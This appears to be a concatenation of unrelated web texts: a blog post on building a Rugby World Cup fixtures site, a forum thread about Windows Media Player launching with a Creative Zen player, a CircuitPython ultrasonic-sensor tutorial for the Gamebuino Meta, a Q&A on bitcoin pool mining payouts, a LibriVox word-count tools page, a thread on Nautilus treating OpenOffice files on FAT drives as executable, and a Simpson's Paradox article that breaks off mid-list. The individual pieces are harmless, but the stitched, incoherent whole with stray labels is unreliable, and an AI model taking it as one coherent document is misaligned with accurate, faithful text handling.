With the 2019 Rugby World Cup now almost at an end, I've been thinking about how I might build a similar website differently next time. In this post, I'll be focusing on two areas in particular - data storage and usability.
Updating the site with match scores & fixtures became a little bit of a burden.
To keep the site as simple as possible, I created a JSON file to store data about the matches. From the outset, I had planned on updating match scores as games completed, and so score data was also stored within this JSON file. It allowed me to quickly spin up the site with data structured just how I wanted it, and no reliance on an external service.
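For illustration, a match entry in that file might have looked something like this (the field names here are illustrative, not the actual schema):

[
  {
    "fixture": "New Zealand v South Africa",
    "venue": "Yokohama",
    "kickoffUTC": "2019-09-21T09:45:00Z",
    "score": { "home": 23, "away": 13 }
  }
]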
However, it also meant that to update match details I would need to update the JSON file manually. That update would then need to be committed using Git for the site to rebuild.
This wouldn't have been an issue had I remained at home during the tournament. But I was regularly making trips to Japan to watch games live, and found myself often in a position where I was unable to complete the update process. This meant that the data on the website was sometimes a day or two behind.
How would I handle data storage next time?
If I had to build this site again, I would look to use an online data store such as Airtable to store match and score data. This way, I would be able to update scores through the Airtable app quickly. Using webhooks, IFTTT or Zapier, I'd then be able to automate the build process for the site. This would allow me to keep the website static. Since my phone's always with me, it would speed up the update process significantly (even if Zapier or IFTTT take 15 minutes to pick up changes to Airtable bases).
I might make the time zone conversion more dynamic.
I've definitely got to learn more about service workers.
As a bit of an afterthought when building the website, I decided to try and make it a progressive web app (PWA). This allows the site to be downloaded by a user and run on their device as though it were a native app. However, to be fair, I did this with very little knowledge of setting up service workers.
Since I was using Eleventy as the static site generator to build the site, I found this plugin that provides PWA capability for Eleventy sites. I followed the creator's guide to set it up, and pretty much left it from there. It worked, in that I was able to download the site to my phone and run it as an app. However, because of the basic implementation I had used, my app (and website for that matter) was presenting me with cached data and would only update if I manually refreshed the page.
I'd definitely like to build more PWAs in the future, and so learning more about service workers is definitely on my to-do list for this year!
Perhaps next time I'd add some live score functionality.
This would depend on being able to find and access data to pull in live scores. I flirted with the idea of trying to hack the official Rugby World Cup website to either scrape data from their match pages or find JSON data I could use. In the end, it was too much effort, and I also didn't want myself getting into a mess over copyright/data infringements.
A friend of mine also suggested perhaps linking to an official Twitter hashtag for each game, or to an external match centre so that people could follow games live there. Both are ideas I'll explore in the future if I decide to build a similar site.
Building this site for the 2019 Rugby World Cup as a personal project sure did result in more learnings than I was anticipating. It's given me things to learn more about and also shown me that I am capable of spinning up a full site with minimal turnaround without relying on any frameworks. I'm hoping to spin up a website for next year's southern hemisphere rugby season, but that's still some time away. In the meantime, I've got a few more things to study up on.
|
OPCFW_CODE
|
When I plug in my Zen Vision M, Windows Media Player 10 starts up and starts synchronizing. I want a totally different program to come up -- or NO PROGRAM AT ALL! I can't find a way to do this with the Zen. I went into WMP settings and said don't synchronize. It ignores me. I tried going to Windows Explorer and changing device properties, but that tab is not available.
Stop WMP10 from starting when I plug in Zen Vision
OK, under Windows Media Player, SYNC SETTINGS, I found a menu that allows me to change syncing from automatic to manual. So now the syncing doesn't occur when I plug in the device. But Windows Media Player 10 STILL opens, and I don't want it to. I'd rather have nothing open, or else a program of my choosing. Just to be clear, here's a copy of my post at Experts Exchange:
When I plug in my Zen Vision M, Windows Media Player 10 opens. (For technical reasons I need to use WMP version 10, not 11 or beyond.)
I want a totally different program to come up -- or NO PROGRAM AT ALL! -- when I plug in the Zen player.
I can't find a way to do this with the Zen. I went into WMP settings and said don't synchronize, which worked. But when I go into the device properties, there's no menu for choosing which program opens with the device. You don't get the usual menus under Windows Explorer.
In fact, the only way I can get to a device properties menu at all is to plug in the device, and then go to Zen Media Explorer (which is a shortcut / device under Windows Explorer). The device appears there as a sub-folder, and has a properties menu. But again, this menu doesn't allow for choosing which programs run when the device is plugged in.
I found a check box that said "show zen in windows explorer as portable device". I checked this and restarted explorer. But all the menus / choices for this are the same as for the above "Zen Media Explorer"
Likewise I looked under Device Manager properties -- there's a properties menu, but nowhere to choose which program runs when the device is plugged in.
Message Edited by dgrrr on -06-2007:4 AM
- [Creative Zen 4gb] How can I plug my Zen into my PC without he's gonna lo
- USB not recognized when i plug in Zen Mi
- Plugged my Zen Vision W in before installing the software.Now its stuck in docked mo
- When I plug my zen micro into my
- Problem with Visio Plug-in Rendering All Layers
- Playcount sync with WMP10- ZEN MI
- Problems with zen x-fi after downloading new update or after plugging it into my hi
- HELP! Plugged Zen Micro into wrong charg
- Creative Zen M 30GB Freezes Everytime I plug into the computer
- MY Zen Micro everytime I plug it in goes and stays on Recovery?????? Can you help
- Battery loses charge... when plugged in car lighter socket (1
- OK, Zen Touch Owners, Listen Up!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Helpful hints for new Creative Zen MP3 2/4/8/16/32 GB (flash) Users On
- ZEN Vision M, will not start up or charge at all.
- I've installed firmware for my zen micro, now i can't use my creative software! Please he
- Can I transfer Music from One Zen Micro to another Zen Mic
- Zen Vision:M files disappe
- Mediasource Organizer destroyed 2000
- MediaSource Organizer not seeing Zen To
|
OPCFW_CODE
|
When pool mining, how do I get paid?
Just for fun I decided to check out bitcoins and do some mining. No visions of making millions or anything, I just find the concept pretty cool. At any rate, I have installed guiminer in Windows and I have installed the Bitcoin wallet from the bitcoin site.
How do I get my address so that I can have someone send me funds, and how do I set up the mining software so that it knows where to deposit funds? I have it up and running using the BTC Guild pool but it has never asked me about how to send me bitcoins.
I am confused; I feel like I am missing the most important piece of the puzzle.
You need to get a receiving address from the client (or from an e-wallet if you prefer) and copy and paste it into the address field against your account in BTCGuild.
Bear in mind that if you're using the Bitcoin-QT client there is a very long synchronisation process to wait for, though you may be able to get a receiving address before it completes (but you won't see any received bitcoins in your wallet until it's synchronised). Depending on your hardware and bandwidth, synchronisation may take several days to complete.
While there's no receiving address against your BTCGuild account, you'll just be accumulating bitcoins against your BTCGuild balance, so you aren't losing anything in the meantime.
Bear in mind that the "difficulty" level of mining for the network as a whole has risen to a very high level due to the arrival of highly efficient dedicated ASIC bitcoin mining hardware. This means mining on graphics cards is likely no longer profitable (depending on purchase and electricity costs) and CPU mining hasn't been profitable for a long time.
I spent pretty much all of last night reading up on this, then came across litecoins. Would this be a better thing to "get into"? Again, from a mining point of view I am not investing "hard" currency in any of this beyond CPU/GPU cycles. I find it fun lol.
@Ominus, if you can earn a profit mining them, then the only reason I can think of not to would be your principles. My guess is that the Litecoin exchange rate is somewhat on the high side, so if you do it I'd recommend exchanging them to another currency quickly rather than hold them, but that's just my personal opinion. I did a little Litecoin mining myself at one point and exchanged them for BTC on vircurex. Some would consider it a waste of time, because much of Bitcoin's value is in its popularity; Litecoin doesn't have that.
Well I am new to this too, but I've already done research on it. The Bitcoin client and the mining client are two different pieces of software for two different purposes (they used to be the same, I read that somewhere). The Bitcoin client is just for handling your wallet: safeguarding your private keys and creating public keys (aka receiving addresses). I'd suggest you try an e-wallet, e.g. Blockchain, in the beginning.
Mining is another thing, where you lend your PC's computing power to the Bitcoin blockchain in return for free bitcoins. It really sucks up your processing power.
So in general you'll just need a BTC client which will generate a receiving address for you which you can paste on the site of the mining pool you're using for mining. You can generate different address for different pools (or senders), so that you can track who's sending how much.
|
STACK_EXCHANGE
|
In this tutorial we will see how to make a short program allowing us to take measurements with the HCSR04 ultrasonic sensor included in the Gamebuino accessory pack, using CircuitPython.
This tutorial is made with Mu IDE for CircuitPython.
If you haven’t installed those yet please refer to the installation guide on our website.
Start by opening Mu editor and creating a new file.
Copy the following bit of code :
from gamebuino_meta import begin, waitForUpdate, display
import time
import board
from digitalio import DigitalInOut, Direction

_USE_PULSEIO = False
try:
    from pulseio import PulseIn
    _USE_PULSEIO = True
except ImportError:
    pass

while True:
    waitForUpdate()
    display.clear()
This will import the Gamebuino libraries needed to make our program work. We add the libraries “time” and “board” that will allow us to use time-related functions and to read data from the console’s external ports (where we plug our sensor). We also add specific functions from the “digitalio” and “pulseio” libraries we will need to manipulate our sensor.
The part beginning by “While True:” is our main loop, without it our program wouldn’t do anything. We will complete it a bit later.
In order to use our sensor we will need to handle the two parts it is made of, those parts being the emitting TRIG part and the receiving ECHO part. Both are plugged into digital pins, D4 for the TRIG part and D3 for the ECHO part. Here we will specify to our program that those two pins will be used.
It’s done in the following way :
trig_pin = DigitalInOut(board.D4)
trig_pin.direction = Direction.OUTPUT
We specify that our digital pin D4 is now called “trig_pin” and we define it as an OUTPUT pin.
We then handle our ECHO pin :
if _USE_PULSEIO:
    echo_pin = PulseIn(board.D3)
    echo_pin.pause()
    echo_pin.clear()
else:
    echo_pin = DigitalInOut(board.D3)
    echo_pin.direction = Direction.INPUT
Here we specify that our D3 pin will be called "echo_pin" and define it as an INPUT pin. Note that we use a conditional expression to define the pin setup, matching the conditional we used to import the PulseIn function above.
We then declare a couple of variables called “timeout” and “error_count” such as :
timeout = 0.1
error_count = 0
We will use them to check if our sensor works properly.
Now we will declare a function to perform a measurement using our sensor. Then we will briefly see how to display the result and handle error cases.
Thus we declare the function “US_measure()” such as :
def US_measure(trig, echo, timing):
Note that this function takes 3 parameters: our two pins, trig and echo, as well as a third parameter called timing. It is not absolutely necessary to do it this way; we do so to make our code clearer and save a bit of time.
Keep in mind we are making a very simple program, in a more complex one it would become increasingly important to keep your code organized and “neat” to make it easier to use and work on.
Now we can fill up our function. First we will initialize our measure at zero to avoid reading unwanted leftover data from the memory. Then we will activate our emitter to send a wave of ultrasounds :
echo.clear()
trig.value = True
time.sleep(0.00001)
trig.value = False
“echo.clear()” clears up the memory so our measure does start at zero.
We then set our trig pin value to "True", wait for 0.00001 seconds (10 microseconds) and set it back to "False". Basically we sent power to our emitter for 10 microseconds so it could send its ultrasound pulse; it may seem short but it is plenty enough.
We will then add a couple of variables to help us for what’s coming :
def US_measure(trig, echo, timing):
    echo.clear()
    trig.value = True
    time.sleep(0.00001)
    trig.value = False
    pulselen = None
    timestamp = time.monotonic()
The value of pulselen is initialized to None, equivalent to null; this variable will be used to return the measured value at the end of our function. The timestamp variable will be used as a reference point in time. The time.monotonic() function gives it an arbitrary time value; subsequent calls to this function will return values that can only be higher. Comparing those values allows us to determine how much time has passed. Check the function's documentation online if you want to know a bit more.
We can now add the second part of our function that will perform a measurement and return the obtained result :
    if _USE_PULSEIO:
        echo.resume()
        while not echo:  # Wait for a pulse
            if (time.monotonic() - timestamp) > timing:
                echo.pause()
                return (0)
        echo.pause()
        pulselen = echo[0]  # first recorded pulse length, in microseconds
    if pulselen >= 65535:
        return (0)
    else:
        # positive pulse time, in microseconds, times 340 meters/sec,
        # divided by 2 (out and back), gives meters. Multiply by 100 for cm:
        # 1/1000000 s/us * 340 m/s * 100 cm/m / 2 = 0.017
        return pulselen * 0.017
We start by activating our ultrasound receiver, the ECHO pin, with the function "echo.resume()".
Then we wait to pick up a signal. If the time elapsed since our timestamp (measured by another call to "time.monotonic()") exceeds our "timing" variable (worth 0.1 second), we stop the sensor with the "echo.pause()" function and return 0, since no measurement occurred.
If we did pick up a signal, we then pause the sensor and store the obtained value in our pulselen variable. This value is equal to the time elapsed between the signal's emission by our TRIG emitter and its reception by our ECHO receiver; it is also called the "flight time".
If the value stored in pulselen is greater than or equal to 65535, then an error occurred: either the distance measured is too great or the sensor malfunctioned. In both cases we return 0.
Finally, if everything went well and our flight time is within a reasonable range, we multiply it by 0.017 and return the value we get. This gives us a distance in centimeters.
Now we can finish our program by completing our main loop. We make a call to our “US_measure” function, store the result in a variable and proceed to display the result on screen.
Nothing too complicated here, our loop should look like this at the moment :
while True:
    waitForUpdate()
    display.clear()
Let’s start by calling our measurement function :
while True:
    waitForUpdate()
    display.clear()
    M_distance = US_measure(trig_pin, echo_pin, timeout)
We create a variable called “M_distance” that calls the function and stores the result.
Now we can either display the result or, in case of errors, display an appropriate message :
while True:
    waitForUpdate()
    display.clear()
    M_distance = US_measure(trig_pin, echo_pin, timeout)
    if M_distance:
        display.print("Distance = ")
        display.print(str(M_distance))
        display.print(" cm")
    else:
        error_count += 1
        if error_count > 9:
            display.print("Measurement Error")
            error_count = 0
    time.sleep(0.1)
We check whether our variable contains a non-null value with "if M_distance:". If it does, then we simply display a bit of text along with the variable's content using the "display.print()" function.
If our variable is null, meaning it is equal to 0, then our function didn’t pick up any significant measurement. In this case we increment our “error_count” variable by 1, if this value gets higher than 9 then our measuring function has been called 10 consecutive times in our main loop without any success. So we display the “Measurement Error” message using the “display.print()” function.
Finally we use the "time.sleep(0.1)" function to pause our loop for 0.1 second between each iteration.
You now have a neat little program to test your HCSR04 ultrasonic sensor with your Gamebuino Meta.
This tutorial is based on a library created by Adafruit that is sadly not available on Gamebuino hardware. Some code elements have been taken from the original documentation of this library to replicate its function.
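For reference, here is the complete program assembled from the snippets above (note that, as in the tutorial, only the PulseIn path of US_measure is actually implemented):

from gamebuino_meta import begin, waitForUpdate, display
import time
import board
from digitalio import DigitalInOut, Direction

_USE_PULSEIO = False
try:
    from pulseio import PulseIn
    _USE_PULSEIO = True
except ImportError:
    pass

# TRIG on D4 (output), ECHO on D3 (input)
trig_pin = DigitalInOut(board.D4)
trig_pin.direction = Direction.OUTPUT

if _USE_PULSEIO:
    echo_pin = PulseIn(board.D3)
    echo_pin.pause()
    echo_pin.clear()
else:
    echo_pin = DigitalInOut(board.D3)
    echo_pin.direction = Direction.INPUT

timeout = 0.1
error_count = 0

def US_measure(trig, echo, timing):
    echo.clear()
    trig.value = True
    time.sleep(0.00001)  # 10 us trigger pulse
    trig.value = False
    pulselen = None
    timestamp = time.monotonic()
    if _USE_PULSEIO:
        echo.resume()
        while not echo:  # wait for a pulse
            if (time.monotonic() - timestamp) > timing:
                echo.pause()
                return 0
        echo.pause()
        pulselen = echo[0]
    if pulselen >= 65535:
        return 0
    # flight time in us * 340 m/s * 100 cm/m / 2 = cm
    return pulselen * 0.017

while True:
    waitForUpdate()
    display.clear()
    M_distance = US_measure(trig_pin, echo_pin, timeout)
    if M_distance:
        display.print("Distance = ")
        display.print(str(M_distance))
        display.print(" cm")
    else:
        error_count += 1
        if error_count > 9:
            display.print("Measurement Error")
            error_count = 0
    time.sleep(0.1)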
|
OPCFW_CODE
|
A second and third version of this course have been released using Next 13+, but this course is great if you want to see another example fullstack project. We now recommend you take the Build an AI-Powered Fullstack Next.js App, v3 course.
Transcript from the "Setup Styles & Tailwind CSS" Lesson
>> All right, so now let's go ahead and actually configure our global CSS so we can actually get things looking the way they're supposed to look. So if we go to our notes here, we're going to use Tailwind CSS, we talked about this before. So to install Tailwind CSS is actually we already installed it with NPM so we don't have to.
[00:00:22] Really do anything. We just have to add a config and we got some more global stuff here. So what you want to do is you just wanna take this global CSS right here that we have, which I could walk you through, but basically React or Next.js's router. Adds extra divs around scroll containers.
[00:00:45] This is basically saying, give us back control of those scroll containers so we can do stuff without this. You can't get like full screen stuff. It's kinda weird. This is the number one thing that'll kill all apps, box sizing. Border box. These are gradients that I made to go in the background.
[00:01:03] Here's our glass thing that we already made. So you can overwrite that. And then same thing like before, Next.js adding extra divs and giving back control to us. So I'm gonna copy all of that. If this thing, well, it doesn't wanna scroll for me, so I'm just gonna have to do it like this.
[00:01:23] Gonna go here, go to global, and I'm just gonna put that in there like that. Scroll down, do the same thing, so just some CSS in there.
>> Yeah. And they were saying the filter that you had just filter, instead if you scroll down, you now have backdrop filter.
[00:01:57] Cuz before you had filter and that was actually filtering out the text.
>> That was filtering out the text. Yeah.
>> Yeah, so now using backdrop filter, it's doing the thing that you-
>> It's doing the thing that I wanted to. Yeah, yeah. Yeah, that makes sense. It looked weird when I was writing it but I went with it.
[00:02:14] [LAUGH] So yeah backdrop filter it makes more sense. All right, and then now we need to set up our Tailwind config which I kind of already have here. You don't really need it because it kind of already knows where everything is other than like this app directory so we want to set that up for the app directory.
[00:02:39] So what you want to do is just on your root of your project you want to do Tailwind config. I also think there's an NPM or a command to do this with a CLI would tell me I just never use it so can't recommend it what it is but I think they do have one, I just always just do it from scratch because it's really not that much.
[00:02:58] So what we're gonna do here is like a Tailwind config. Did I spell that right? Tailwind, I thought it was like a different color if I did. Or was it tailwind dot config? Yeah, tailwind dot config. I know there's an icon for that, so when you don't get those icons, you know you got the file names wrong.
[00:03:58] So you can say, type, and then it's just, it's just like, kind of like an import statement. So you'll say imports in the way that I have it here. Let's see. I just have it here I was copied. This is saying this type is Tailwind CSS config type.
[00:04:18] If we write this in TypeScript, we could just import that type but we're not. So for the content then we just want to go ahead and add the gloves for. The files that have the components that we want apply these to, which in this case is just going to be like the app directory.
[00:04:33] And I think the way you do this, it's going to be like app and then you can do the glob the catch all, then probably the extensions. So in our case, TSX. We're only using that but just to be safe, might as well do that. Might as well do that and might as well do that too I guess, just to be safe.
[00:04:54] And we'll do the same thing for pages, which we probably won't be using, but hey, set yourself up. And then we definitely are using components. Like that. Cool. And then for theme, really the only thing we really care about here is gonna be the fonts. So we're gonna extend the theme, which I believe in Tailwind does exactly what it sounds like: it allows you to extend the theme and not override it with some other value, which is what would happen if you didn't put extend.
[00:05:27] We learned that the hard way. And we want to change the font family here, and what we want to change it to is this CSS variable that we're going to set inside of our layouts. So we're just gonna say sans, and then we're gonna use this font like this: font-inter.
[00:05:47] So if you've never seen CSS variables or properties, that's what it looks like when you declare them. And we're gonna set this in a layout so it just works. Okay, and the last thing we need to do is add these directives to our global CSS. So let's do that.
[00:06:10] Go to our global CSS at the very top. We'll just add those things. If line five looks weird, what this is saying is: apply this style to the Tailwind base layer. These are all considered layers. Let's say we're applying this to the layer called base. Okay, any questions on that?
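(For reference, here's a sketch putting together what's described above. This is my reconstruction, and the --font-inter variable name is an assumption based on the transcript's "font inter":)

// tailwind.config.js
/** @type {import('tailwindcss').Config} */
module.exports = {
  content: [
    './app/**/*.{js,ts,jsx,tsx}',
    './pages/**/*.{js,ts,jsx,tsx}',
    './components/**/*.{js,ts,jsx,tsx}',
  ],
  theme: {
    extend: {
      fontFamily: {
        sans: ['var(--font-inter)'],
      },
    },
  },
  plugins: [],
}

/* and at the very top of the global CSS, the three directives: */
@tailwind base;
@tailwind components;
@tailwind utilities;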
[00:06:49] OK. Let's go see. No, not this one of the great, it's not the full one. OK. All right. So we still got to add some costs here because the whole one's obviously messed up. Let's go check out the other ones. No we didn't do register we did sign it right.
[00:07:14] I think we did sign it. Here we go. So it's not quite but we got obviously Tailwind has kicked in, the glass stuff seems to be somewhat blurry, there's definitely a gradient going on here. We still got a lot more CSS to write when we get to the pages but for the most part Tailwind has kicked in
|
OPCFW_CODE
|
I have to agree with much of the above. In the last 24 hours this forum has gained one new member, and this should be right in the middle of its boom period when it's only just been made public and should be drawing in new members in numbers. The number of posts we're making as a community is fine for the size, so there's all the signs of an active community to reassure potential joinees, but if this forum wants to survive and thrive then it probably needs at least 100 members, and as many over that as possible.
Considering that NYCFC aren't actually playing games right now, the news coming out of the club is understandably sporadic, and while the club are doing a good job of building hype via social media, this forum has a challenge to face to stay active until around November-December time when I'd estimate that the announcements and excitement will ramp up and become constant. It'll be a challenge maintaining that with only 35 registered members. Once the club starts playing games I doubt that creating and maintaining an active forum community will take much effort, but right now it's a different story.
Unfortunately I use social media only for reading opinions, not for spreading my own - I've tried to run a Twitter campaign before and it didn't go so well, so I'm not really in a great position to give advice on this matter. That said, if I were to say one thing, it's that I've noticed that the #nycfc hashtag is fairly active in general. I've got no idea how many people actively read it, but on the assumption that it's not just me, perhaps any attempts to advertise the forum should try including it?
Edit: one other thing - and it does pain me somewhat to say this. I've gathered that a lot of NYCFC fans on twitter and facebook are quite adamant that this club should resist having too strong ties to MCFC, and they don't want a MCFC-USA. They are probably right in that this club being too openly associated with Manchester City would drive away a lot of potential interest. I've noticed, however, that a high percentage of us here are MCFC fans ourselves. It might be advisable trying to consciously limit talk of Man City to the Premier League forum and the occasional thread about how the two clubs will work in tandem - otherwise we may gain a reputation for being a Manchester City forum about NYCFC, which would predictably reduce our incoming member count. I'm probably not helping with my avatar, but oh well. I kind of joined up thinking I'd be the token (Man) City fan, but it might have been a poor decision in retrospect.
I don't know though. I'm just throwing that out there. What do other people think?
|
OPCFW_CODE
|
LibriVox member peegee has written a script for web browsers which may make the BC's job of compiling word counts for the Magic Window a little easier.
How it Works
The script runs against the HTML ebooks on Project Gutenberg.
- you click the paragraph where you want to start the count,
- it asks you the target number of words,
- it quickly goes through every paragraph from that point onwards and counts the words and the running total
- it stops when it reaches the target, or the end of the chapter if before
- the page is temporarily changed to display the word counts right there at the end of each paragraph
- you can repeat this as many times as you like, each time you click a paragraph the temporary page changes are removed
Here are a few screenshots to illustrate the process:
Installing the Script
The method of installation depends on the browser (Firefox and Chrome may need to be re-started after installation, Opera does not):
- Greasemonkey You will first need the GreaseMonkey add-on for Firefox which is available from this link.
- Firefox Install Once you have GreaseMonkey installed, go here and click on the Install button
- TamperMonkey First you'll need to install TamperMonkey from the Chrome store.
- WordCount Then, you'll be able to install the word count extension from here.
- Opera First choose a folder where Opera should keep user scripts, then go to the script
- click the Install button to get the script in a new tab in Opera.
- from the Opera menu click File > Save As to save it into the folder you chose in the first step (probably best to just keep the suggested file-name - whatever name you choose it MUST end in .user.js )
The script only works on the Gutenberg online HTML books, not the text or zipped HTML, or other formats.
If you have any problems installing or using this script you can either post a message in this forum thread or send a Private Message to peegee.
Script for Gutenberg Texts
This website script will count out the number of words in each chapter. Enter the Gutenberg project ID number, fill in additional information (how many chapters there are, how the chapter headers are written, etc) and it will return the chapter word counts and the first and last words in the chapter.
Web Browser Bookmarklet
Creating a new bookmark, with the code below, will count the words in a highlighted piece of text.
You can use Word Count for the bookmark name, and then put the code into the address box, in the details section.
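(The code itself hasn't survived in this copy of the page; a minimal equivalent bookmarklet would be:)

javascript:(function(){var t=window.getSelection().toString().trim();alert(t?t.split(/\s+/).length+' words':'Nothing selected');})();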
Microsoft Office Word
Microsoft Word, and probably other text document creation software, has a built-in word counter. Copy and paste your text into a blank page, Select All (or highlight the portion you are word counting), and go to Review > Word Count.
|
OPCFW_CODE
|
On Tue, 2021-01-12 at 15:10 +0100, Stasiek Michalski wrote:
I actually already had a version of our forums running,
and I think if we are gonna migrate the forums we might as well go
with something open source right away ;)
I'm not opposed to that, of course.
The snag we had, and I still can't tell how important it is, is the
thing that also happens with your version of the forums: posts on the
forums before a certain date are completely broken due to changes in
encoding in PHP a decade ago.
I noticed these character encoding errors, too, and decided to ignore
them because they also occur in the existing forum. As long as the
migration doesn't make anything worse than it currently is, I'm
satisfied. Also, fixing the character encoding issues can be solved
independently in a separate task, at least if upgrading to vb5.
Porting the forums to discourse is probably not as forgiving, though.
In that case, it is required to fix the encoding issues first, I guess.
Honestly, if you have the time to spend on vb5, I would rather
see the time spent on migrating to Discourse, and I can probably help
in some capacity so we get it all salted as well right away.
I'm not opposed to migrating to Discourse, or helping with it. It's
just that I had the impression the effort had petered out a bit, and
maybe was semi-abandoned?
So my idea was to at least take one small step forward by making sure
we at least run on a reasonably modern and supported platform, thereby
giving us ample time to work out the next step.
The most important note on that migration is that you have to use a
converter script on the database, because if you don't you end up with
the only working posts being the ones from before 2011 or so. I used:
with everything working correctly.
Interesting - I'll give that a go.
Additional point: since Discourse maps users onto emails, we have to
request SUSE IT to give us a list of usernames matching emails
(vb4 has wrong emails for usernames, I don't think it's important to
explain why that is).
Has this been requested already? If not, why?
We agreed with the Forums team on deploying at least . Discourse will
need to be set up using OIDC provided by our ipsilon instance at
, and I hope we can also use the js script that embeds
discourse into pages as a comments system for news.opensuse.org so we
have comments functionality there (in the future we may also want to
use it for software-o-o, but that's still up in the air).
Sorry, I've been out of the Heroes loop for a while, wasn't aware of
that agreement. I do agree that OIDC integration is a must-have, and
any other integration between our online assets would also be cool.
|
OPCFW_CODE
|
I have observed the following on different machines, using openSUSE 10.3 and 11 - different accounts - same behavior. It is strange, but I have searched for a solution several times, spent hours, and found nothing.
OK, the problem is: OpenOffice files are not correctly associated with OpenOffice in Nautilus. I know the open-with thing but it does not help:
Every time I click on .odt .ods .od… Nautilus asks me: Do you want to run "Filename.odt" or display its contents? "Filename.odt" is an executable text file. [Run in Terminal] [Display] [Cancel] [Run]
Frustrating. RMB/Openwith/Other…/OpenOffice works, but it does not allow me to save that as a default decision.
As it does happen on freshly created new accounts too, I do not think it is a personal settings problem - or is it?
All my 5 machines are either openSUSE 10.3 or updated to openSUSE 11; same behavior everywhere …
Yes, thanks, but as I said the open-with dialog does not help. Sure I can open the file by pressing RMB/Openwith/…/…/ but there is NO possibility to say "remember that" or similar. So this does not help.
Meanwhile I could find out a very interesting thing. The described behavior ONLY happens on FAT16 (USB disks) plugged in and auto-mounted in Nautilus.
Can someone reproduce this issue?
(To make it clear: opening by double-click on a local odt file works. Copy the same file to the USB drive, double-click on it, and Nautilus says it's an executable text file … no "reassigning" possible via open-with …)
> yes, thanks, but as I sad the open with dialog does not help. Shure I
> can open the filer with by pressing RMB/Openwith/…/…/ but there is
> NO possibility to say “remember that” or similar. So this does not
> Meanwhile I could find out a very interesting thing. The described
> behavior ONLY happens on FAT16 (USB disks) pluged in and auto mounted in
> Can someone reproduce this issue?
> (To make it clear: open by dobbleclick on a local odt file works. copy
> the same file to the usb drive. double click on it nautilus says its an
> executeable text file … no “reassigning possible” via open with …)
FAT, in any of its variations, does not support the READ/WRITE/EXEC flags
present in linux's ext2/3 and variants. The system emulates R/W/X and forces
them on for the files… which is why you'll always see 'executable' jpg's and
whatnot, since the filesystem defaults to emulating those permissions for the
files.
When the file is copied to the FAT16 (or FAT32) filesystem, it gains the
execute flag automatically. Nautilus senses the executable flag first, then
interprets the magic numbers for each filetype… which kills the 'open with'
association.
Copying the file to the hard drive doesn't help, since the RWX flags are
copied along with it… so you end up with a file marked as executable,
although it's not executable (in any manner). If you right click on the
file, choose properties and clear the 'is executable' flag on the permissions
tab, all will be good.
This is a "bug/feature" associated with Microsoft's FAT filesystem formats.
msdos/fat16/fat32/vfat are all affected by this. Adding 'mode=0644' (or an
'fmask=' option that clears the execute bits) to the mount options can help.
Again, this isn't an issue with Nautilus, this is an issue concerning using
FAT based filesystems to convey files.
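(As a sketch of what that mount-option fix can look like in /etc/fstab - the device node and mount point here are placeholders for whatever your stick actually is:)

# strip the execute bit from regular files on the FAT volume
# fmask=0133 -> files appear as 0644, dmask=0022 -> dirs as 0755
/dev/sdb1  /media/usbstick  vfat  user,noauto,fmask=0133,dmask=0022  0  0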
Well, Loni might be right, but sometimes you cannot do anything about having .odt files marked executable (i.e. our heterogeneous network here, having Windows and Linux machines mounting the same "fileserver"). For example, I do not have permissions to change file attributes on the server. What am I to do then?
I do think there is another solution, since our Gentoo workstations do not show this behavior; it is only my openSUSE 11 which just annoys me every time by asking if I want to execute my odt file.
Since this happens with all USB sticks as well, I do not understand why I should be the only one annoyed by this?
I do use the default settings to mount USB sticks in openSUSE (at least I did not change anything) … I didn't find anything in the forums here …
|
OPCFW_CODE
|
target_group_arns option not supporting lists
I have issues
I'm submitting a...
[x] bug report
[ ] feature request
[ ] support request
[ ] kudos, thank you, warm fuzzy
What is the current behavior?
I am trying to add target groups to the Autoscaling group, using the target_group_arns option from the worker_groups variable.
When setting this variable as a list, empty or not (it is defined by default as a list), I get the error:
module.eks.aws_autoscaling_group.workers: lookup: lookup() may only be used with flat maps, this map contains elements of type list in:
${compact(split(",", coalesce(lookup(var.worker_groups[count.index], "target_group_arns", ""), local.workers_group_defaults["target_group_arns"])))}
However, when I input a string of multiple comma-separated arns, it accepts them and works as intended
If this is a bug, how to reproduce? Please include a code sample if relevant.
module "eks" {
source = "terraform-aws-modules/eks/aws"
version = "4.0.2"
cluster_name = "test-cluster"
worker_groups = [
{
ami_id = "ami-0e82e73403dd69fa3"
instance_type = "m5a.xlarge"
asg_desired_capacity = "2"
asg_max_size = "2"
asg_min_size = "2"
target_group_arns = [] # Should work, does not
# target_group_arns = ["<arn1>", "<arn2>"] # Should work, does not
# target_group_arns = "<arn1>,<arn2>" # Works, should probably not
}
]
worker_group_count = "1"
}
What's the expected behavior?
I would expect that, when using a list, `terraform apply` works and the ARNs are added to the ASG target groups.
Are you able to fix this problem and submit a PR? Link here if you have already.
Environment details
Affected module version: 4.0.2
OS: OS X
Terraform version: 0.11.14
Any other relevant info
You're reading the documentation for v5 of the module which is for Terraform 0.12 and the new HCL2 syntax.
Terraform 0.11 did not do well with lists in lists or interpolation syntax.
Check the comments for the version of the module you're using:
https://github.com/terraform-aws-modules/terraform-aws-eks/blob/v4.0.2/local.tf#43
target_group_arns = "" # A comma delimited list of ALB target group ARNs to be associated to the ASG
Ah, my bad sorry.
Thanks
|
GITHUB_ARCHIVE
|
How Can This Be?
Mathematical paradoxes are always interesting, especially when they seem even more than paradoxical...that is, just plain wrong! A prime example is Simpson's Paradox.
Consider these baseball batting averages for two players, broken down by their performance against right-handed and left-handed pitchers:
Notice how Player A overall has a better batting average than Player B (i.e. r > R), yet Player B had better batting averages against both left-handed and right-handed pitchers (i.e. r1 < R1 and r2 < R2). How can this be?
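For concreteness, here is one hypothetical set of numbers (not Knapp's actual data) exhibiting the pattern:

vs. left-handers:  Player A 2/10 (.200),  Player B 30/100 (.300)
vs. right-handers: Player A 80/200 (.400), Player B 9/20 (.450)
Overall:           Player A 82/210 (.390), Player B 39/120 (.325)

Player B wins both splits, yet Player A wins overall.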
Rather than spoil the paradox for you, I note that nothing is wrong with either the data or the mathematics. If you need resolution, you can find "it" by searching on-line (and see Tan's article below for a great geometric explanation of this same data).
The paradox was "first" described by mathematician Edward Simpson in a 1951 paper. He was not aware that statisticians Karl Pearson et al. and Udny Yule had already described the paradox in 1899 and 1903, respectively.
Though the above data represents fictitious data, real-life examples exist. In his book A Mathematician at the Ballpark, Ken Ross illustrates the paradox using the batting averages of Derek Jeter and David Justice during the baseball years 1995 and 1996.
The February 1982 issue of the American Statistician provides multiple real-life examples:
- The overall subscription rate for the journal American History Illustrated increased from January, 1979 to February, 1979, yet the rate decreased for every category of subscriber.
